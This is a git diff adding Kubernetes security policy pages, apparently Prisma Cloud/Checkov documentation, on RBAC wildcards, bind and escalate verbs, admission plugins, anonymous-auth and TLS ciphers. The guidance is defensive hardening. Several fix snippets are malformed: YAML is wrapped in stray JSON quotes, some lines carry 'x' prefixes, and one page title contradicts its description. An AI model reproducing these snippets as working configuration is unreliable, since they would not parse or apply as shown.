+ + +[source,RoleBinding] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: +subjects: +- kind: ServiceAccount + name: default +---- + +[source,ClusterRoleBinding] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +subjects: +- kind: ServiceAccount + name: default +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-minimized-wildcard-use-in-roles-and-clusterroles.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-minimized-wildcard-use-in-roles-and-clusterroles.adoc new file mode 100644 index 000000000..d0de25bbc --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-minimized-wildcard-use-in-roles-and-clusterroles.adoc @@ -0,0 +1,62 @@ +== Wildcard use is not minimized in Roles and ClusterRoles +// Wildcard use not minimized in Roles and ClusterRoles + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1abd7f34-5d4d-4542-bb95-414857c82c3e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py[CKV_K8S_49] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +In Kubernetes, Roles and ClusterRoles are used to define the permissions that are granted to users, service accounts, and other entities in the cluster. +Roles are namespaced and apply to a specific namespace, while ClusterRoles are cluster-wide and apply to the entire cluster. +When you define a Role or ClusterRole, you can use wildcards to specify the resources and verbs that the role applies to. +For example, you might specify a role that allows users to perform all actions on all resources in a namespace by using the wildcard "*" for the resources and verbs.
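+Such an over-permissive Role might look like the following sketch (the name and namespace are placeholders for illustration, not taken from the policy itself):
+
+[source,yaml]
+----
+kind: Role
+apiVersion: rbac.authorization.k8s.io/v1
+metadata:
+  namespace: default
+  name: wildcard-role-example
+rules:
+- apiGroups: ["*"]
+  resources: ["*"]
+  verbs: ["*"]
+----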
+However, using wildcards can be a security risk because they grant broad permissions that may not be necessary for a specific role. +If a role has too many permissions, it could potentially be abused by an attacker or compromised user to gain unauthorized access to resources in the cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + + + +[source,go] +---- +resource "kubernetes_cluster_role" "pass" { + metadata { + name = "terraform-example" + } + + rule { + api_groups = [""] + resources  = ["namespaces", "pods"] + verbs      = ["get", "list", "watch"] + } +} +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-roles-and-clusterroles-that-grant-permissions-to-bind-rolebindings-or-clusterrolebindings-are-minimized.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-roles-and-clusterroles-that-grant-permissions-to-bind-rolebindings-or-clusterrolebindings-are-minimized.adoc new file mode 100644 index 000000000..cb7044cf4 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-roles-and-clusterroles-that-grant-permissions-to-bind-rolebindings-or-clusterrolebindings-are-minimized.adoc @@ -0,0 +1,60 @@ +== Kubernetes Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings are not minimized +// Kubernetes Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings not minimized + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 26540a95-91c4-41fb-bbdf-a1521991149e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py[CKV_K8S_157] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Roles or ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings should be minimized
to reduce powerful identities in the cluster. +Such Roles and ClusterRoles can attach existing permissions (Roles and ClusterRoles) to arbitrary identities. +RoleBindings grant permissions over a namespace, while ClusterRoleBindings grant permissions over the entire cluster. +Minimize such Roles and ClusterRoles to limit the number of powerful credentials that, if compromised, could escalate privileges and possibly take over the entire cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind*: ClusterRole, Role +* *Arguments:* rules. ClusterRoles and Roles that grant the "bind" verb over "clusterrolebindings" or "rolebindings" in the "rbac.authorization.k8s.io" API group should be minimized. + + +[source,yaml] +---- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: +rules: +- apiGroups: ["rbac.authorization.k8s.io"] + resources: ["roles", "clusterroles"] + verbs: ["get", "list", "create", "update"] +x- apiGroups: ["rbac.authorization.k8s.io"] +x resources: ["clusterrolebindings"] +x verbs: ["bind"] +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-roles-and-clusterroles-that-grant-permissions-to-escalate-roles-or-clusterrole-are-minimized.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-roles-and-clusterroles-that-grant-permissions-to-escalate-roles-or-clusterrole-are-minimized.adoc new file mode 100644 index 000000000..b372e93b0 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-roles-and-clusterroles-that-grant-permissions-to-escalate-roles-or-clusterrole-are-minimized.adoc @@ -0,0 +1,59 @@ +== Kubernetes Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRole are not minimized +// Kubernetes Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRole not minimized + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +|
c88cc0a0-2670-460c-9420-bacf24ee91ae + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py[CKV_K8S_158] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Roles or ClusterRoles that grant permissions to escalate Roles or ClusterRoles should be minimized to reduce powerful identities in the cluster. +Such Roles and ClusterRoles can add arbitrary permissions to arbitrary identities. +Escalating Roles can add permissions over a namespace, while escalating ClusterRoles can add permissions over the entire cluster. +Minimize such Roles and ClusterRoles to limit the number of powerful credentials that, if compromised, could escalate privileges and possibly take over the entire cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind*: ClusterRole, Role +* *Arguments:* rules. ClusterRoles and Roles that grant the "escalate" verb over "clusterroles" or "roles" in the "rbac.authorization.k8s.io" API group should be minimized.
+ + +[source,yaml] +---- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: +rules: +- apiGroups: ["rbac.authorization.k8s.io"] + resources: ["roles", "clusterrolebindings"] + verbs: ["get", "list", "create", "update"] +x- apiGroups: ["rbac.authorization.k8s.io"] +x resources: ["clusterroles"] +x verbs: ["escalate"] +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-securitycontext-is-applied-to-pods-and-containers.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-securitycontext-is-applied-to-pods-and-containers.adoc new file mode 100644 index 000000000..8622ba876 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-securitycontext-is-applied-to-pods-and-containers.adoc @@ -0,0 +1,94 @@ +== securityContext is not applied to pods and containers +// securityContext not applied to pods and containers + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9cc81c69-dc64-48fc-ad1f-d9c07ff85051 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py[CKV_K8S_29] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +*securityContext* defines privilege and access control settings for your pod or container, and holds security configurations that will be applied to a container. +Some fields are present in both *securityContext* and *PodSecurityContext*; when both are set, *securityContext* takes precedence. +Well-defined privilege and access control settings will enhance assurance that your pod is running with the properties it requires to function.
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container / Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* securityContext (Optional) A field that defines privilege and access control settings for your Pod or Container. + + +[source,container] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: ++ securityContext: +---- + +[source,pod] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: ++ securityContext: +---- + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: ++ securityContext: +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: ++ securityContext: +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-alwaysadmit-is-not-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-alwaysadmit-is-not-set.adoc new file mode 100644 index 000000000..0ad532b01 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-alwaysadmit-is-not-set.adoc @@ -0,0 +1,98 @@ +== The admission control plugin AlwaysAdmit is set +// Admission control plugin AlwaysAdmit is set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3762e3bb-a855-4191-a4e3-2fd0aacd146d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py[CKV_K8S_79] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not allow all requests. 
+Setting the admission control plugin AlwaysAdmit allows all requests and filters none. +The AlwaysAdmit admission controller was deprecated in Kubernetes v1.13. +Its behavior was equivalent to turning off all admission controllers. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver-passed + namespace: kube-system +spec: + containers: + - command: + - kube-apiserver + - --enable-admission-plugins=other + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-alwayspullimages-is-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-alwayspullimages-is-set.adoc new file mode 100644 index 000000000..7b3c6cd24 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-alwayspullimages-is-set.adoc @@ -0,0 +1,68 @@ +== The admission control plugin AlwaysPullImages is not set +// Admission control plugin AlwaysPullImages is not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +|
fe981952-2e96-4313-ab0e-05925403d50d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py[CKV_K8S_80] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Always pull images. +Setting admission control policy to AlwaysPullImages forces every new pod to pull the required images every time. +In a multi-tenant cluster, users can be assured that their private images can only be used by those who have the credentials to pull them. +Without this admission control policy, once an image has been pulled to a node, any pod from any user can use it simply by knowing the image's name, without any authorization check against the image ownership. +When this plug-in is enabled, images are always pulled prior to starting containers, which means valid credentials are required. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --enable-admission-plugins=AlwaysPullImages + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ... +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-eventratelimit-is-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-eventratelimit-is-set.adoc new file mode 100644 index 000000000..024748368 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-eventratelimit-is-set.adoc @@ -0,0 +1,71 @@ +== The admission control plugin EventRateLimit is not set +// Admission control plugin
EventRateLimit is not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9780e1eb-3d72-41be-90ad-65fab2400917 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlEventRateLimit.py[CKV_K8S_78] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Limit the rate at which the API server accepts requests. +Using EventRateLimit admission control enforces a limit on the number of events that the API Server will accept in a given time slice. + +A misbehaving workload could overwhelm and DoS the API Server, making it unavailable. +This particularly applies to a multi-tenant cluster, where there might be a small percentage of misbehaving tenants which could have a significant impact on the performance of the cluster overall. + +Hence, it is recommended to limit the rate of events that the API server will accept. + +NOTE: This is an Alpha feature in the Kubernetes 1.15 release. 
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +apiVersion: apiserver.config.k8s.io/v1 +kind: AdmissionConfiguration +metadata: + name: "admission-configuration-passed" +plugins: + - name: ValidatingAdmissionWebhook + configuration: + apiVersion: apiserver.config.k8s.io/v1 + kind: WebhookAdmissionConfiguration + kubeConfigFile: "" ++ - name: EventRateLimit ++ path: eventconfig.yaml + - name: MutatingAdmissionWebhook + configuration: + apiVersion: apiserver.config.k8s.io/v1 + kind: WebhookAdmissionConfiguration + kubeConfigFile: "" +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-namespacelifecycle-is-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-namespacelifecycle-is-set.adoc new file mode 100644 index 000000000..f78fa3e82 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-namespacelifecycle-is-set.adoc @@ -0,0 +1,65 @@ +== The admission control plugin NamespaceLifecycle is not set +// Admission control plugin NamespaceLifecycle is not set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2dfa708e-008d-4585-a20b-41c788621aff + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py[CKV_K8S_83] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Reject creating objects in a namespace that is undergoing termination. +Setting admission control policy to NamespaceLifecycle ensures that objects cannot be created in non-existent namespaces, and that namespaces undergoing termination are not used for creating the new objects. 
+This is recommended to enforce the integrity of the namespace termination process and also for the availability of the newer objects. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --enable-admission-plugins=NamespaceLifecycle + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-noderestriction-is-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-noderestriction-is-set.adoc new file mode 100644 index 000000000..bb0bc3045 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-noderestriction-is-set.adoc @@ -0,0 +1,66 @@ +== The admission control plugin NodeRestriction is not set +// Admission control plugin NodeRestriction is not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6286b8bb-b744-4700-898e-a953cb7ffd0c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py[CKV_K8S_85] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Limit the `Node` and `Pod` objects that a kubelet could modify. +Using the `NodeRestriction` plug-in ensures that the kubelet is restricted to the `Node` and ``Pod ``objects that it could modify as defined. +Such kubelets will only be allowed to modify their own `Node` API object, and only modify `Pod` API objects that are bound to their node. 
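+The `NodeRestriction` plug-in identifies kubelets by their credentials in the `system:nodes` group, so it is typically enabled together with the `Node` authorization mode. A sketch of the combined API server flags (flag order and surrounding manifest are illustrative):
+
+[source,yaml]
+----
+spec:
+  containers:
+  - command:
+    - kube-apiserver
+    - --enable-admission-plugins=NodeRestriction
+    - --authorization-mode=Node,RBAC
+----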
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --enable-admission-plugins=NodeRestriction + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-podsecuritypolicy-is-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-podsecuritypolicy-is-set.adoc new file mode 100644 index 000000000..7d4e7db08 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-podsecuritypolicy-is-set.adoc @@ -0,0 +1,70 @@ +== The admission control plugin PodSecurityPolicy is not set +// Admission control plugin PodSecurityPolicy is not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2401aa65-cc25-42f5-b5cf-dd9afa96174e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py[CKV_K8S_84] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Reject creating pods that do not match Pod Security Policies. +A Pod Security Policy is a cluster-level resource that controls the actions that a pod can perform and what it has the ability to access. +The PodSecurityPolicy objects define a set of conditions that a pod must run with in order to be accepted into the system. 
+Pod Security Policies are comprised of settings and strategies that control the security features a pod has access to and hence this must be used to control pod access permissions. + +NOTE: When the PodSecurityPolicy admission plugin is in use, there needs to be at least one PodSecurityPolicy in place for ANY pods to be admitted. See section 5.2 for recommendations on PodSecurityPolicy settings. + + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --enable-admission-plugins=PodSecurityPolicy + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-securitycontextdeny-is-set-if-podsecuritypolicy-is-not-used.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-securitycontextdeny-is-set-if-podsecuritypolicy-is-not-used.adoc new file mode 100644 index 000000000..8274e0bbf --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-securitycontextdeny-is-set-if-podsecuritypolicy-is-not-used.adoc @@ -0,0 +1,65 @@ +== The admission control plugin SecurityContextDeny is set if PodSecurityPolicy is used +// Admission control plugin SecurityContextDeny is set if PodSecurityPolicy is used + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 77990153-befb-46dd-9671-5d6bdb08a79d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py[CKV_K8S_81] + +|Severity +|LOW + +|Subtype +|Build + 
+|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +The SecurityContextDeny admission controller can be used to deny pods which make use of some SecurityContext fields which could allow for privilege escalation in the cluster. +This should be used where PodSecurityPolicy is not in place within the cluster. +SecurityContextDeny can be used to provide a layer of security for clusters which do not have PodSecurityPolicies enabled. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --enable-admission-plugins=SecurityContextDeny + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-serviceaccount-is-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-serviceaccount-is-set.adoc new file mode 100644 index 000000000..31a895cbb --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-serviceaccount-is-set.adoc @@ -0,0 +1,65 @@ +== The admission control plugin ServiceAccount is not set +// Admission control plugin ServiceAccount not set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b9d6899b-6a35-4c1c-b618-d1788578ea86 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py[CKV_K8S_82] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Automate service accounts management. 
+When you create a pod, if you do not specify a service account, it is automatically assigned the default service account in the same namespace. +You should create your own service account and let the API server manage its security tokens. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --enable-admission-plugins=ServiceAccount + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-anonymous-auth-argument-is-set-to-false-1.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-anonymous-auth-argument-is-set-to-false-1.adoc new file mode 100644 index 000000000..517f06911 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-anonymous-auth-argument-is-set-to-false-1.adoc @@ -0,0 +1,68 @@ +== The --anonymous-auth argument is not set to False for API server +//'--anonymous-auth' argument not set to 'False' for API server + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 044ce38b-e5b3-424d-833e-fab13219fd43 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py[CKV_K8S_68] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Disable anonymous requests to the API server. +When enabled, requests that are not rejected by other configured authentication methods are treated as anonymous requests. +These requests are then served by the API server. 
+You should rely on authentication to authorize access and disallow anonymous requests. +If you are using RBAC authorization, it is generally considered reasonable to allow anonymous access to the API Server for health checks and discovery purposes, and hence this recommendation is not scored. +However, you should consider whether anonymous discovery is an acceptable risk for your purposes. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind*: Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --anonymous-auth=false + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-anonymous-auth-argument-is-set-to-false.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-anonymous-auth-argument-is-set-to-false.adoc new file mode 100644 index 000000000..051c31163 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-anonymous-auth-argument-is-set-to-false.adoc @@ -0,0 +1,66 @@ +== The --anonymous-auth argument is not set to False for Kubelet +// '--anonymous-auth' argument not set to 'False' for Kubelet + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6ae55812-7a47-4582-9b3d-45f7ed0d22bd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py[CKV_K8S_138] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Disable anonymous requests to the Kubelet server. 
+When enabled, requests that are not rejected by other configured authentication methods are treated as anonymous requests. +These requests are then served by the Kubelet server. +You should rely on authentication to authorize access and disallow anonymous requests. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --anonymous-auth=false + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-api-server-only-makes-use-of-strong-cryptographic-ciphers.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-api-server-only-makes-use-of-strong-cryptographic-ciphers.adoc new file mode 100644 index 000000000..5b78e49a2 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-api-server-only-makes-use-of-strong-cryptographic-ciphers.adoc @@ -0,0 +1,125 @@ +== The API server does not make use of strong cryptographic ciphers + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4a0e3798-0949-43e5-8340-650cbc468179 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py[CKV_K8S_105] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + +//// +Bridgecrew +Prisma Cloud +* The API server does not make use of strong cryptographic ciphers* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4a0e3798-0949-43e5-8340-650cbc468179 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py [CKV_K8S_105] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== +//// + + +=== Description + + +Ensure that the API server is configured to only use strong cryptographic ciphers. +TLS ciphers have had a number of known vulnerabilities and weaknesses, which can reduce the protection provided by them. +By default Kubernetes supports a number of TLS ciphersuites including some that have security concerns, weakening the protection provided. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --tls-cipher-suites=TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver-should-pass + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs 